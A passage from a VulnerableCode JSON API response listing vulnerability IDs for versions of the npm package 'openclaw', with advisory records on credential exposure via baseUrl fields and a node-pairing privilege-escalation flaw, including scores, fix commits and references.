5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kthe-sgfb-
kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkjm-wcmt-43br"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-
2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-
1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.7"}],"aliases":["GHSA-pjvx-rx66-r3fg"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-tu4b-f885-eyds"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91368?format=json
","vulnerability_id":"VCID-twsq-vfde-4fbf","summary":"OpenClaw Exposes Credentials Embedded in baseUrl Fields via config.get and channels.status\n## Summary\nRead-scoped gateway snapshots could expose credentials embedded in channel baseUrl and related endpoint fields.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `f0202264d0de7ad345382b9008c5963bcefb01b7`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- src/channels/account-snapshot-fields.ts now strips URL userinfo from channel status snapshot fields.\n- src/config/redact-snapshot.ts now redacts credential-bearing baseUrl and httpUrl fields while preserving safe context.\n\nOpenClaw thanks @zpbrent for reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/f0202264d0de7ad345382b9008c5963bcefb01b7","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/f0202264d0de7ad345382b9008c5963bcefb01b7"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-ppwq-6v66-5m6j","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","
scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-ppwq-6v66-5m6j"},{"reference_url":"https://github.com/advisories/GHSA-ppwq-6v66-5m6j","reference_id":"GHSA-ppwq-6v66-5m6j","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-ppwq-6v66-5m6j"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},
{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},
{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},
{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},
{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["GHSA-ppwq-6v66-5m6j"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-twsq-vfde-4fbf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89807?format=json","vul
nerability_id":"VCID-u1ru-vdfp-x3hu","summary":"OpenClaw: node.pair.approve missing callerScopes validation allows low-privilege operator to approve malicious nodes\n## Summary\n\nThe node pairing approval path did not consistently enforce that the approving caller already held every scope requested by the node.\n\n## Impact\n\nA lower-privileged operator could approve a pending node request for broader scopes and extend privileges onto the paired node.\n\n## Affected Component\n\n`src/infra/node-pairing.ts, src/gateway/server-methods/nodes.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `4d7cc6bb4f` (`gateway: restrict node pairing approvals`).\n\nOpenClaw thanks @AntAISecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33577","reference_id":"","reference_type":"","scores":[{"value":"0.00013","scoring_system":"epss","scoring_elements":"0.02402","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00013","scoring_system":"epss","scoring_elements":"0.02398","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.03525","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33577"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/4d7cc6bb4fac68b5a5fadd1c5a23168281221f34","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_syste
m":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:41Z/"}],"url":"https://github.com/openclaw/openclaw/commit/4d7cc6bb4fac68b5a5fadd1c5a23168281221f34"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2x4x-cc5g-qmmg","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:41Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2x4x-cc5g-qmmg"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33577","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"4.9","scoring_system":"cvssv4","scoring_el
